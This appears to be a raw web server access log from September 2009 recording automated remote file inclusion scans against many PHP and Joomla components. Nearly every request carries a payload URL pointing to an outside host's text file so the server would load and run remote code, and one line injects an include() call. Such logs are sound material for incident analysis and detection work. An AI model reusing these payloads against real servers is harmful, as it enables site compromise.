211.75.220.49 - - [07/Sep/2009:12:14:22 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
211.75.220.49 - - [07/Sep/2009:12:14:22 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
211.75.220.49 - - [07/Sep/2009:12:14:22 -0500] "GET /logs/access_log.1244764800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:12:14:50 -0500] "GET /logs/access_log.1231200000//modules/vwar/admin/admin.php?vwar_root=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:12:14:54 -0500] "GET /logs/access_log.1231200000//modules/vwar/admin/admin.php?vwar_root=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
211.75.220.49 - - [07/Sep/2009:12:14:59 -0500] "GET /logs/access_log.1243814400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
211.75.220.49 - - [07/Sep/2009:12:15:09 -0500] "GET /logs/access_log.1244505600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
190.144.44.36 - - [07/Sep/2009:12:15:11 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
190.144.44.36 - - [07/Sep/2009:12:15:11 -0500] "GET /logs/access_log.1236038400//modules/vwar/admin/admin.php?vwar_root=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
190.144.44.36 - - [07/Sep/2009:12:15:11 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
190.144.44.36 - - [07/Sep/2009:12:15:13 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
190.144.44.36 - - [07/Sep/2009:12:15:13 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
190.144.44.36 - - [07/Sep/2009:12:15:13 -0500] "GET /logs/access_log.1236038400//modules/vwar/admin/admin.php?vwar_root=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.236.47.23 - - [07/Sep/2009:12:23:16 -0500] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
222.236.47.23 - - [07/Sep/2009:12:23:16 -0500] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
222.236.47.23 - - [07/Sep/2009:12:23:16 -0500] "GET /logs/access_log.1232236800//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 370 "-""Mozilla/5.0"
222.236.47.23 - - [07/Sep/2009:12:23:16 -0500] "GET /logs/access_log.1237507200//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 370 "-""Mozilla/5.0"
222.236.47.23 - - [07/Sep/2009:12:23:40 -0500] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
222.236.47.23 - - [07/Sep/2009:12:23:40 -0500] "GET /logs/access_log.1232236800//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 370 "-""Mozilla/5.0"
222.236.47.23 - - [07/Sep/2009:12:23:40 -0500] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
222.236.47.23 - - [07/Sep/2009:12:23:40 -0500] "GET /logs/access_log.1237507200//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 370 "-""Mozilla/5.0"
222.239.227.196 - - [07/Sep/2009:12:24:18 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
222.239.227.196 - - [07/Sep/2009:12:24:18 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://geocities.com/blade_tea/idmaira.txt????? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
79.174.78.83 - - [07/Sep/2009:12:24:24 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:12:24:24 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:12:24:24 -0500] "GET /logs/access_log.1244764800//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:12:24:35 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:12:24:35 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:12:24:35 -0500] "GET /logs/access_log.1244764800//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:12:24:39 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:12:24:39 -0500] "GET /logs/access_log.1244764800//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:12:24:39 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
188.40.50.203 - - [07/Sep/2009:12:29:08 -0500] "GET /logs/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 363 "-""Mozilla/5.0"
188.40.50.203 - - [07/Sep/2009:12:29:08 -0500] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 358 "-""Mozilla/5.0"
188.40.50.203 - - [07/Sep/2009:12:29:08 -0500] "GET /logs/access_log.1247616000/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 385 "-""Mozilla/5.0"
188.40.50.203 - - [07/Sep/2009:12:29:08 -0500] "GET /logs/access_log.1239580800/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 385 "-""Mozilla/5.0"
188.40.50.203 - - [07/Sep/2009:12:29:27 -0500] "GET /logs/access_log.1236470400/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 385 "-""Mozilla/5.0"
59.150.247.202 - - [07/Sep/2009:12:29:27 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
59.150.247.202 - - [07/Sep/2009:12:29:30 -0500] "GET /logs/access_log.1236211200//index.php?DOCUMENT_ROOT=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
59.150.247.202 - - [07/Sep/2009:12:29:33 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
59.150.247.202 - - [07/Sep/2009:12:29:40 -0500] "GET /logs/access_log.1236038400//index.php?DOCUMENT_ROOT=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
94.236.18.27 - - [07/Sep/2009:12:29:50 -0500] "GET /logs//admin/admin.php?vwar_root=http://bov.t35.com/idv6.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
94.236.18.27 - - [07/Sep/2009:12:29:50 -0500] "GET //admin/admin.php?vwar_root=http://bov.t35.com/idv6.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
75.102.22.248 - - [07/Sep/2009:12:30:50 -0500] "GET /logs//admin/admin.php?vwar_root=http://bov.t35.com/idv6.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.826"
75.102.22.248 - - [07/Sep/2009:12:30:50 -0500] "GET //admin/admin.php?vwar_root=http://bov.t35.com/idv6.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.826"
121.101.214.52 - - [07/Sep/2009:12:31:02 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.101.214.52 - - [07/Sep/2009:12:31:02 -0500] "GET /logs/access_log.1237420800//index.php?DOCUMENT_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
117.110.59.2 - - [07/Sep/2009:12:31:18 -0500] "GET /logs/access_log.1237075200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
117.110.59.2 - - [07/Sep/2009:12:31:18 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
117.110.59.2 - - [07/Sep/2009:12:31:18 -0500] "GET /logs/access_log.1236038400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
117.110.59.2 - - [07/Sep/2009:12:31:18 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ferienwohnung-mechthild-jentze.de/administrator/components/com_extcalendar/zfxid1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
59.24.49.35 - - [07/Sep/2009:12:37:41 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
59.24.49.35 - - [07/Sep/2009:12:37:41 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
59.24.49.35 - - [07/Sep/2009:12:37:43 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
59.24.49.35 - - [07/Sep/2009:12:37:43 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
59.24.49.35 - - [07/Sep/2009:12:37:43 -0500] "GET /logs/access_log.1240012800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
59.24.49.35 - - [07/Sep/2009:12:37:49 -0500] "GET /logs/access_log.1240012800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
59.24.49.35 - - [07/Sep/2009:12:37:49 -0500] "GET /logs/access_log.1244246400//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
59.24.49.35 - - [07/Sep/2009:12:37:59 -0500] "GET /logs/access_log.1244246400//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:38:24 -0500] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:38:41 -0500] "GET /logs/access_log.1242172800/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:38:44 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:38:47 -0500] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:12:39:06 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:12:39:06 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:12:39:06 -0500] "GET /logs/access_log.1244764800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
199.96.29.70 - - [07/Sep/2009:12:39:09 -0500] "GET /logs//claroline/auth/ldap/authldap.php?includePath=http://indo.home.ro/idbit??? HTTP/1.1" 404 321 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
199.96.29.70 - - [07/Sep/2009:12:39:09 -0500] "GET //claroline/auth/ldap/authldap.php?includePath=http://indo.home.ro/idbit??? HTTP/1.1" 404 316 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
92.50.143.90 - - [07/Sep/2009:12:39:10 -0500] "GET /logs/access_log.1242172800/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:39:14 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:39:44 -0500] "GET /logs/access_log.1245974400/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.236.47.23 - - [07/Sep/2009:12:39:50 -0500] "GET /logs/access_log.1236211200//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [07/Sep/2009:12:39:50 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
222.236.47.23 - - [07/Sep/2009:12:39:50 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
222.236.47.23 - - [07/Sep/2009:12:39:52 -0500] "GET /logs/access_log.1236211200//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.23 - - [07/Sep/2009:12:39:52 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
222.236.47.23 - - [07/Sep/2009:12:39:52 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:40:01 -0500] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:40:01 -0500] "GET /logs/access_log.1242086400/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:40:01 -0500] "GET /logs/access_log.1242172800/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
77.221.130.4 - - [07/Sep/2009:12:40:01 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
77.221.130.4 - - [07/Sep/2009:12:40:01 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
222.239.227.142 - - [07/Sep/2009:12:40:03 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:12:40:04 -0500] "GET /logs/access_log.1243036800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:12:40:09 -0500] "GET /logs/access_log.1245715200//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
77.221.130.4 - - [07/Sep/2009:12:40:14 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
77.221.130.4 - - [07/Sep/2009:12:40:14 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
92.50.143.90 - - [07/Sep/2009:12:40:26 -0500] "GET /logs/access_log.1245974400/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:40:37 -0500] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:40:37 -0500] "GET /logs/access_log.1242086400/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:40:37 -0500] "GET /logs/access_log.1242172800/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:40:39 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:40:51 -0500] "GET /logs/access_log.1237852800/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:40:51 -0500] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:40:51 -0500] "GET /logs/access_log.1238284800/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:40:52 -0500] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:40:52 -0500] "GET /logs/access_log.1237852800/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:40:52 -0500] "GET /logs/access_log.1238284800/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
85.25.236.152 - - [07/Sep/2009:12:40:56 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
85.25.236.152 - - [07/Sep/2009:12:40:56 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
85.25.236.152 - - [07/Sep/2009:12:40:56 -0500] "GET /logs/access_log.1244764800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
85.25.236.152 - - [07/Sep/2009:12:40:58 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
85.25.236.152 - - [07/Sep/2009:12:40:58 -0500] "GET /logs/access_log.1244764800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
85.25.236.152 - - [07/Sep/2009:12:40:58 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:41:00 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:41:01 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:12:41:02 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:12:41:02 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:12:41:02 -0500] "GET /logs/access_log.1244764800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:41:05 -0500] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:41:05 -0500] "GET /logs/access_log.1237852800/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:41:05 -0500] "GET /logs/access_log.1238284800/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.239.227.142 - - [07/Sep/2009:12:41:06 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
85.25.236.152 - - [07/Sep/2009:12:41:37 -0500] "GET /logs/access_log.1243036800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
85.25.236.152 - - [07/Sep/2009:12:41:41 -0500] "GET /logs/access_log.1245715200//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
85.25.236.152 - - [07/Sep/2009:12:41:43 -0500] "GET /logs/access_log.1243036800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:12:41:45 -0500] "GET /logs/access_log.1243036800//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
85.25.236.152 - - [07/Sep/2009:12:41:47 -0500] "GET /logs/access_log.1245715200//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:12:41:49 -0500] "GET /logs/access_log.1245715200//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
85.25.236.152 - - [07/Sep/2009:12:42:02 -0500] "GET /avatar.php?page=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
85.25.236.152 - - [07/Sep/2009:12:42:02 -0500] "GET /logs/avatar.php?page=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
85.25.236.152 - - [07/Sep/2009:12:42:02 -0500] "GET /logs/access_log.1245542400/avatar.php?page=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:42:16 -0500] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:12:42:24 -0500] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
